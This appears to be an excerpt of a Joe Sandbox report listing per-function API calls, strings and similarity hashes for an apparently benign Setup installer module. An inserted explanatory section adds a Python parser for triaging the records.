                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3H_prolog3_Version_memset
                                                                                                                                                                    • String ID: Could not determine OS version$OS Description = %s$OS Version = %d.%d.%d, Platform %d$OS Version Information
                                                                                                                                                                    • API String ID: 3727276431-2914782974
                                                                                                                                                                    • Opcode ID: b8ab86ff4aa5a9fa6aba13312089bc8e22a465db9a430c0c430bff2a2a4d0431
                                                                                                                                                                    • Instruction ID: 3ed5273f37a8aafb609a33801801175d654bb7b7565f62d218632d1940669afe
                                                                                                                                                                    • Opcode Fuzzy Hash: b8ab86ff4aa5a9fa6aba13312089bc8e22a465db9a430c0c430bff2a2a4d0431
                                                                                                                                                                    • Instruction Fuzzy Hash: 98416A75900158DBCB21DBA8CD45FCDB7B8AF09308F4480E5E548EB691D770AB94CFA1
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69D795C8
                                                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 69D795DB
                                                                                                                                                                    • VariantClear.OLEAUT32(00000008), ref: 69D7962E
                                                                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 69D7960E
                                                                                                                                                                      • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
                                                                                                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 69D79651
                                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 69D796F8
                                                                                                                                                                    Strings
                                                                                                                                                                    • schema validation error: attribute not found - , xrefs: 69D79676
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3StringVariant$AllocClearException@8FreeInitThrow
                                                                                                                                                                    • String ID: schema validation error: attribute not found -
                                                                                                                                                                    • API String ID: 8365360-3489740836
                                                                                                                                                                    • Opcode ID: 762356c8d771af560d8ae910f25608ba1566a593f65c42a39ab3262efc3a9312
                                                                                                                                                                    • Instruction ID: 5248c467332df934f8256ab58bedaf0fb40646e787af2d464f4f4386a0b2b2c5
                                                                                                                                                                    • Opcode Fuzzy Hash: 762356c8d771af560d8ae910f25608ba1566a593f65c42a39ab3262efc3a9312
                                                                                                                                                                    • Instruction Fuzzy Hash: C0416D76800249EFCB00DFE4C984EDE7BB9BF05318F148669F521AB680CB349A44CB61
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69DB3752
                                                                                                                                                                      • Part of subcall function 69D75D3F: __EH_prolog3.LIBCMT ref: 69D75D46
                                                                                                                                                                      • Part of subcall function 69D75D3F: GetModuleFileNameW.KERNEL32(69D50000,00000010,00000104,?,69DA831D,00000000), ref: 69D75D93
                                                                                                                                                                      • Part of subcall function 69D7C259: __EH_prolog3.LIBCMT ref: 69D7C260
                                                                                                                                                                      • Part of subcall function 69DA8E4A: PathAppendW.SHLWAPI(00000000,?,?,?,?,?,69DB99FD,00000000,00000000,?,?,?,00000000,?,UiInfo.xml), ref: 69DA8E6E
                                                                                                                                                                    • PathFileExistsW.SHLWAPI(?,SetupResources.dll,00000000,00000738,00000000,69DAFA6E,0000000C,69DB3A05,?,69D6A794,?), ref: 69DB37B7
                                                                                                                                                                    • PathFileExistsW.SHLWAPI(00000000,LocalizedData.xml,00000000,00000738,00000000), ref: 69DB3846
                                                                                                                                                                      • Part of subcall function 69D739AD: __EH_prolog3.LIBCMT ref: 69D739B4
                                                                                                                                                                    Strings
                                                                                                                                                                    • LocalizedData.xml, xrefs: 69DB3835
                                                                                                                                                                    • SetupResources.dll missing from %d directory, xrefs: 69DB37BE
                                                                                                                                                                    • SetupResources.dll, xrefs: 69DB37A0
                                                                                                                                                                    • LocalizedData.xml missing from %d directory, xrefs: 69DB384D
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3$FilePath$Exists$AppendModuleName
                                                                                                                                                                    • String ID: LocalizedData.xml$LocalizedData.xml missing from %d directory$SetupResources.dll$SetupResources.dll missing from %d directory
                                                                                                                                                                    • API String ID: 3590062302-1245617268
                                                                                                                                                                    • Opcode ID: e24bde761948246c585ef08177d53ee55897ad77089fbb698414ec3626b5bbea
                                                                                                                                                                    • Instruction ID: cff546011d54a28b7ed0f91033a485f67ac4c1ace474bad21ddc82b1c89e3b9f
                                                                                                                                                                    • Opcode Fuzzy Hash: e24bde761948246c585ef08177d53ee55897ad77089fbb698414ec3626b5bbea
                                                                                                                                                                    • Instruction Fuzzy Hash: 08316DB6800149EFDB10DBB8CC45EAE7BA8AF01328F549275E424AB795D731DA148B72
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69DB1021
                                                                                                                                                                      • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
                                                                                                                                                                      • Part of subcall function 69D7C406: RegOpenKeyExW.KERNEL32(80000002,?,00000000,00000001,?,?,?,?,?,69DB35F5,?,SYSTEM\CurrentControlSet\Control\Windows,?,?,CSDReleaseType), ref: 69D7C426
                                                                                                                                                                      • Part of subcall function 69D7C406: RegQueryValueExW.KERNEL32(?,?,00000000,00000000,69DB0F4A,00000004,?,?,?,69DB35F5,?,SYSTEM\CurrentControlSet\Control\Windows,?,?,CSDReleaseType), ref: 69D7C43F
                                                                                                                                                                      • Part of subcall function 69D7C406: RegCloseKey.KERNEL32(?,?,?,?,69DB35F5,?,SYSTEM\CurrentControlSet\Control\Windows,?,?,CSDReleaseType,?,02602230,00000004,69DB0F4A,?), ref: 69D7C44E
                                                                                                                                                                    • GetLastError.KERNEL32(?,Software\Microsoft\DevDiv,?,?,PerfLab,?,?,0000000C,69DAA58E,?,69D6A794,?,02602230,?,00000000,?), ref: 69DB1092
                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000,?,Failed to record IsInternal,?,Software\Microsoft\DevDiv,?,?,PerfLab,?,?,0000000C,69DAA58E,?,69D6A794,?), ref: 69DB10F0
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorH_prolog3Last$CloseOpenQueryValue
                                                                                                                                                                    • String ID: Failed to record IsAdmin$Failed to record IsInternal$PerfLab$Software\Microsoft\DevDiv
                                                                                                                                                                    • API String ID: 716194244-1174128248
                                                                                                                                                                    • Opcode ID: 4db38332002e158122de8a4306e166909ab29b9a7adcf951ce85630423c96938
                                                                                                                                                                    • Instruction ID: 8116e00a21776e3cb92ab7338a3ee498fbd051df65045a53feba64d82ef000a9
                                                                                                                                                                    • Opcode Fuzzy Hash: 4db38332002e158122de8a4306e166909ab29b9a7adcf951ce85630423c96938
                                                                                                                                                                    • Instruction Fuzzy Hash: F83192B5A00245EFD710DBA4CE06AAE7BB9FF45354F508638E421EBA90C734DA05C671
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%
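
The records in this section are Joe Sandbox's per-function disassembly summaries for the module it snapshots as Setup at base 69D50000 in process 4: the API calls each function makes (calls that actually sit inside a callee are listed as "Part of subcall function"), the strings it references with their xref addresses, and the Similarity identifiers (API ID, String ID, Opcode and Instruction fuzzy hashes) used to match the function against other samples. A report with thousands of these records is easier to triage parsed than read. The Python below is an added example and is not code from the report or from Joe Sandbox; SAMPLE is constructed from three records on this page, trimmed to the fields the parser handles, and WATCHLIST is my assumed list of APIs worth a second look because they back OS-version and install-path probing, which is what the GetVersionExW and PathFileExistsW records here show.

```python
# Added example (not Joe Sandbox code): parse the per-function records in this
# report and flag functions whose API list touches an assumed watchlist.
import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed from three records on this page, trimmed to the fields parsed below.
SAMPLE = """
APIs
• __EH_prolog3_GS.LIBCMT ref: 69DA7F74
  • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
• _memset.LIBCMT ref: 69DA7FD4
• GetVersionExW.KERNEL32 ref: 69DA7FED
Strings
Similarity
• API ID: H_prolog3H_prolog3_Version_memset
• String ID: Could not determine OS version$OS Description = %s$OS Version = %d.%d.%d, Platform %d$OS Version Information
• Instruction Fuzzy Hash: 98416A75900158DBCB21DBA8CD45FCDB7B8AF09308F4480E5E548EB691D770AB94CFA1
Uniqueness

Uniqueness Score: -1.00%

APIs
• __EH_prolog3.LIBCMT ref: 69D795C8
• VariantInit.OLEAUT32(?), ref: 69D795DB
• __CxxThrowException@8.LIBCMT ref: 69D796F8
Strings
• schema validation error: attribute not found - , xrefs: 69D79676
Similarity
• String ID: schema validation error: attribute not found -
• Instruction Fuzzy Hash: C0416D76800249EFCB00DFE4C984EDE7BB9BF05318F148669F521AB680CB349A44CB61
Uniqueness

Uniqueness Score: -1.00%

APIs
• __EH_prolog3.LIBCMT ref: 69DB3752
  • Part of subcall function 69D75D3F: GetModuleFileNameW.KERNEL32(69D50000,00000010,00000104,?,69DA831D,00000000), ref: 69D75D93
• PathFileExistsW.SHLWAPI(?,SetupResources.dll,00000000,00000738,00000000,69DAFA6E,0000000C,69DB3A05,?,69D6A794,?), ref: 69DB37B7
• PathFileExistsW.SHLWAPI(00000000,LocalizedData.xml,00000000,00000738,00000000), ref: 69DB3846
Strings
• SetupResources.dll missing from %d directory, xrefs: 69DB37BE
Similarity
• String ID: LocalizedData.xml$SetupResources.dll$SetupResources.dll missing from %d directory
• Instruction Fuzzy Hash: 08316DB6800149EFDB10DBB8CC45EAE7BA8AF01328F549275E424AB795D731DA148B72
Uniqueness

Uniqueness Score: -1.00%
"""

SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity", "Uniqueness"}
API_RE = re.compile(r"^\s*• (?:Part of subcall function (?P<sub>[0-9A-F]+): )?"
                    r"(?P<name>[\w@]+)\.(?P<module>\w+)(?:\(.*\))?,? ref: (?P<ref>[0-9A-F]+)\s*$")
STRING_RE = re.compile(r"^\s*• (?P<text>.*), xrefs: (?P<ref>[0-9A-F]+)\s*$")
FIELD_RE = re.compile(r"^\s*• (?P<key>[^:]+): (?P<value>.*)$")

@dataclass
class ApiCall:
    name: str
    module: str
    ref: str                          # call-site address
    subcall_of: Optional[str] = None  # callee address when listed as "Part of subcall function"

@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)
    strings: list = field(default_factory=list)  # (text, xref address) pairs
    fields: dict = field(default_factory=dict)   # key/value lines from Similarity and dump-source blocks

    @property
    def string_ids(self) -> list:
        v = self.fields.get("String ID")         # Joe Sandbox joins these with '$'
        return v.split("$") if v else []

    def api_names(self, include_subcalls: bool = True) -> set:
        return {a.name for a in self.apis if include_subcalls or a.subcall_of is None}

def parse_records(text: str) -> list:
    """One FunctionRecord per 'APIs' heading; section headings switch the parser state."""
    records, current, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in SECTIONS:
            if line == "APIs":                   # every record opens with its APIs block
                current = FunctionRecord()
                records.append(current)
            section = line
        elif current is None:
            continue
        elif section == "APIs" and (m := API_RE.match(raw)):
            current.apis.append(ApiCall(m["name"], m["module"], m["ref"], m["sub"]))
        elif section == "Strings" and (m := STRING_RE.match(raw)):
            current.strings.append((m["text"].rstrip(), m["ref"]))
        elif m := FIELD_RE.match(raw):
            current.fields[m["key"]] = m["value"]
    return records

# Assumed watchlist (mine, not the report's): APIs behind OS-version and install-path probing.
WATCHLIST = {"GetVersionExW", "RegOpenKeyExW", "GetModuleFileNameW", "PathFileExistsW"}

def flag_records(records: list, watchlist: set = WATCHLIST) -> list:
    """(Instruction Fuzzy Hash, sorted matched API names) for each record touching the watchlist."""
    return [(r.fields.get("Instruction Fuzzy Hash", ""), sorted(r.api_names() & watchlist))
            for r in records if r.api_names() & watchlist]
```

Keeping the subcall entries distinct matters for attribution: Joe Sandbox lists a callee's APIs under the caller, so a plain text search would credit GetModuleFileNameW to the path-checking function when the call actually lives in 69D75D3F. `api_names(include_subcalls=False)` returns only the direct calls, and the Instruction Fuzzy Hash returned by `flag_records` is the value to carry into a cross-sample comparison.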

APIs
• __EH_prolog3.LIBCMT ref: 69D776B3
  • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
• GetModuleFileNameW.KERNEL32(00000000,00000010,00000104), ref: 69D77711
• GetFileVersionInfoSizeW.KERNELBASE(00000010,?), ref: 69D7772A
• GetFileVersionInfoW.KERNELBASE(00000010,?,00000000,00000000), ref: 69D77745
• VerQueryValueW.VERSION(00000000,69D5496C,?,?), ref: 69D7775D
Memory Dump Source
• Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
• Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
Similarity
• API ID: File$H_prolog3InfoVersion$ModuleNameQuerySizeValue
• String ID: %d.%d.%d.%d$0.0.0.0
• API String ID: 1538924429-464342551
• Opcode ID: a324a1a852175807cc51702c5fe8e48e2df9b294a59755cca4360779de3cf809
• Instruction ID: b2afb1f9f9aec7b933edaac1f8fa3b39ac62aa2606f92d51210f4b50c18d5dc2
• Opcode Fuzzy Hash: a324a1a852175807cc51702c5fe8e48e2df9b294a59755cca4360779de3cf809
• Instruction Fuzzy Hash: BF3149B5900219EBDB00DFA4CC84CBEBBB9FF45354B409539E811AB691DB349E16CBB1
Uniqueness

Uniqueness Score: -1.00%

APIs
• __EH_prolog3.LIBCMT ref: 69DA7E7F
  • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
  • Part of subcall function 69DA8380: __EH_prolog3.LIBCMT ref: 69DA8387
Memory Dump Source
• Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
• Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
Similarity
• API ID: H_prolog3
• String ID: AlwaysUploaded$Disabled$Unknown$User Experience Data Collection Policy$User Experience Data Collection Policy: %s$UserControlled
• API String ID: 431132790-3357067047
• Opcode ID: dc707f5c4d5aa9cd393f53f8a0e2cd94fbac394322e99f88c7c6e89643832226
• Instruction ID: 142f93f0e08813397cb8393b75abb91a4991df05923652ab1e401761e8d83c5d
• Opcode Fuzzy Hash: dc707f5c4d5aa9cd393f53f8a0e2cd94fbac394322e99f88c7c6e89643832226
• Instruction Fuzzy Hash: D52189B1900149EBCB00DBE8C845EEEBBF9AF15308F508475E150E7B91D734AA19CBB2
Uniqueness

Uniqueness Score: -1.00%

APIs
• CreateWindowExW.USER32(00000000,STATIC,00000000,0000000E,80000000,80000000,00000000,00000000,00000000,00000000,00000000), ref: 69D98F00
  • Part of subcall function 69DC8244: GetWindowLongW.USER32(?,000000F0), ref: 69DC826A
  • Part of subcall function 69DC8244: GetParent.USER32(?), ref: 69DC827C
  • Part of subcall function 69DC8244: GetWindowRect.USER32(?,?), ref: 69DC8296
  • Part of subcall function 69DC8244: GetWindowLongW.USER32(00000000,000000F0), ref: 69DC82AC
  • Part of subcall function 69DC8244: MonitorFromWindow.USER32(?,00000002), ref: 69DC82CB
• GetWindowLongW.USER32(?,000000F0), ref: 69D98F15
• SetWindowLongW.USER32(?,000000F0,00000000), ref: 69D98F25
• LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00000010), ref: 69D98F32
  • Part of subcall function 69DABC49: SendMessageW.USER32(?,00000172,00000000,?), ref: 69DABC5A
• GetDesktopWindow.USER32 ref: 69D98F44
  • Part of subcall function 69DC8244: GetWindow.USER32(?,00000004), ref: 69DC8288
  • Part of subcall function 69DC8244: GetMonitorInfoW.USER32(00000000,?), ref: 69DC82E8
  • Part of subcall function 69DC8244: SetWindowPos.USER32(?,00000000,?,?,000000FF,000000FF,00000015), ref: 69DC83B8
• ShowWindow.USER32(?,00000001), ref: 69D98F57
Memory Dump Source
• Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
• Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
Similarity
• API ID: Window$Long$Monitor$CreateDesktopFromImageInfoLoadMessageParentRectSendShow
• String ID: STATIC
• API String ID: 4041997823-1882779555
• Opcode ID: 8d24eb2a3ba505eaaea1a79db28317753d53e10168a39cdff46b0d78e1aa50bb
• Instruction ID: 599be55564adf04f1ea8b847be274f1a98f3ab1d26a5000dc5a46933261b20a4
• Opcode Fuzzy Hash: 8d24eb2a3ba505eaaea1a79db28317753d53e10168a39cdff46b0d78e1aa50bb
• Instruction Fuzzy Hash: 6A115175605211BFEB209F258C09E9BBFADEF8B360F104629F429D3290DB359C11CBA1
Uniqueness

Uniqueness Score: -1.00%

APIs
• __EH_prolog3_GS.LIBCMT ref: 69DBACDF
• GetTokenInformation.KERNELBASE(00000002,00000001(TokenIntegrityLevel),00000000,00000000,00000009,0000000C,69DA49C0,69D6A5D8,69D6A54C), ref: 69DBAD06
• GetLastError.KERNEL32 ref: 69DBAD08
• GetTokenInformation.KERNELBASE(00000002,00000001(TokenIntegrityLevel),00000008,00000400,00000400,80070216), ref: 69DBAD81
Memory Dump Source
• Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
• Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
Similarity
• API ID: InformationToken$ErrorH_prolog3_Last
• String ID:
• API String ID: 654496852-0
• Opcode ID: 2d8a02c4204f533c94b2c31816e68daa4fcb4b745183bc20242449fa1564a100
• Instruction ID: 7e769de6c4a69467f8b5bc5a6fb30916930189022b19591134d5283c174611c4
• Opcode Fuzzy Hash: 2d8a02c4204f533c94b2c31816e68daa4fcb4b745183bc20242449fa1564a100
• Instruction Fuzzy Hash: CA31FDBA800515DBCF11CF68CA41A9E77F8AF05771B218035E942AFA58EB31DE41CBE1
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 69D75D3F: __EH_prolog3.LIBCMT ref: 69D75D46
  • Part of subcall function 69D75D3F: GetModuleFileNameW.KERNEL32(69D50000,00000010,00000104,?,69DA831D,00000000), ref: 69D75D93
  • Part of subcall function 69D85B82: __EH_prolog3_GS.LIBCMT ref: 69D85B8C
  • Part of subcall function 69D85B82: _memset.LIBCMT ref: 69D85BBB
  • Part of subcall function 69D85B82: FindFirstFileW.KERNEL32(?,?,????), ref: 69D85BDA
  • Part of subcall function 69D85B82: FindClose.KERNEL32(?), ref: 69D85CC1
• __CxxThrowException@8.LIBCMT ref: 69D85FF0
  • Part of subcall function 69DC8EAB: _memcpy_s.LIBCMT ref: 69DC8EFC
  • Part of subcall function 69DA8E4A: PathAppendW.SHLWAPI(00000000,?,?,?,?,?,69DB99FD,00000000,00000000,?,?,?,00000000,?,UiInfo.xml), ref: 69DA8E6E
• PathFileExistsW.SHLWAPI(?,LocalizedData.xml,?,?,?,F0D05EFD,ParameterInfo.xml,00000000,?,ParameterInfo.xml,?,00000000,?,?,ParameterInfo.xml), ref: 69D85EF1
  • Part of subcall function 69D85CE1: __EH_prolog3.LIBCMT ref: 69D85CE8
  • Part of subcall function 69D85CE1: CoInitialize.OLE32(00000000), ref: 69D85D1A
  • Part of subcall function 69D85CE1: CoCreateInstance.OLE32(69D6A974,00000000,00000017,69D6A9A4,?,?,?,00000014,69D85F14,?,?,?,?,F0D05EFD,ParameterInfo.xml,00000000), ref: 69D85D38
  • Part of subcall function 69D85CE1: CoUninitialize.OLE32(?,?,00000014,69D85F14,?,?,?,?,F0D05EFD,ParameterInfo.xml,00000000,?,ParameterInfo.xml,?,00000000,?), ref: 69D85DE8
  • Part of subcall function 69D85CE1: SysFreeString.OLEAUT32(00000738), ref: 69D85DF1
Strings
• LocalizedData.xml in resource folder %s, does not have a Language element, xrefs: 69D85F87
• LocalizedData.xml, xrefs: 69D85EDF
• LocalizedData.xml is missing in resource folder %s. Every resource folder needs a LocalizedData.xml, xrefs: 69D86026
• ParameterInfo.xml, xrefs: 69D85E45, 69D85FA2
Memory Dump Source
• Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
• Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
Similarity
• API ID: File$FindH_prolog3Path$AppendCloseCreateException@8ExistsFirstFreeH_prolog3_InitializeInstanceModuleNameStringThrowUninitialize_memcpy_s_memset
• String ID: LocalizedData.xml$LocalizedData.xml in resource folder %s, does not have a Language element$LocalizedData.xml is missing in resource folder %s. Every resource folder needs a LocalizedData.xml$ParameterInfo.xml
• API String ID: 2922719316-412676173
• Opcode ID: c6f89c65c8cfa759146e00bbd675dc98f18f9dbc0aebfcfdb55452bbdf188112
• Instruction ID: 8db2f1259bfc2dbba96bdb86dd0206889d21682f8f0b981effce2e9aacd94034
• Opcode Fuzzy Hash: c6f89c65c8cfa759146e00bbd675dc98f18f9dbc0aebfcfdb55452bbdf188112
• Instruction Fuzzy Hash: 3B616B75408381DFC700DFA8C884A5EBBE8BF85318F448A6DF4A6D7A51DB35E5098B63
Uniqueness

Uniqueness Score: -1.00%

APIs
• __EH_prolog3.LIBCMT ref: 69D84DC7
  • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
  • Part of subcall function 69DA8CD5: __EH_prolog3.LIBCMT ref: 69DA8CDC
  • Part of subcall function 69DA8C7A: __EH_prolog3.LIBCMT ref: 69DA8C81
  • Part of subcall function 69DA8C24: __EH_prolog3.LIBCMT ref: 69DA8C2B
  • Part of subcall function 69D7838A: __EH_prolog3.LIBCMT ref: 69D78391
  • Part of subcall function 69D78415: __EH_prolog3.LIBCMT ref: 69D7841C
  • Part of subcall function 69D7A378: __EH_prolog3.LIBCMT ref: 69D7A37F
• __CxxThrowException@8.LIBCMT ref: 69D84ED4
  • Part of subcall function 69DD14AA: KiUserExceptionDispatcher.NTDLL(?,?,69DCC129,00000C00,?,?,?,?,69DCC129,00000C00,69DEBA3C,69E076D4,00000C00,00000020,69DAF845,?), ref: 69DD14EC
Strings
• " for Text element in , xrefs: 69D84E0D
• Found duplicate ID attribute ", xrefs: 69D84DF8
• \LocalizedData.xml. Duplicates not allowed., xrefs: 69D84E34
• ParameterInfo.xml, xrefs: 69D84DE8
Memory Dump Source
• Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
• Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
Similarity
• API ID: H_prolog3$DispatcherExceptionException@8ThrowUser
• String ID: " for Text element in $Found duplicate ID attribute "$ParameterInfo.xml$\LocalizedData.xml. Duplicates not allowed.
• API String ID: 3417717588-3340550128
• Opcode ID: c6d05f152f3244774f10828bba000d0cdbc4d89d9b790319d697d75e51c1aeae
• Instruction ID: 6376894deb8ed2d4e6dae1fc484f36e8bfe163ebdab973356ebbd93373da1774
• Opcode Fuzzy Hash: c6d05f152f3244774f10828bba000d0cdbc4d89d9b790319d697d75e51c1aeae
• Instruction Fuzzy Hash: 68414E76800148EFCB11DBF8C940EEDB7A8AF15328F548265F525EB6C1DB34DA198B72
Uniqueness
• Uniqueness Score: -1.00%

APIs
• __EH_prolog3.LIBCMT ref: 69DB4026
  • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
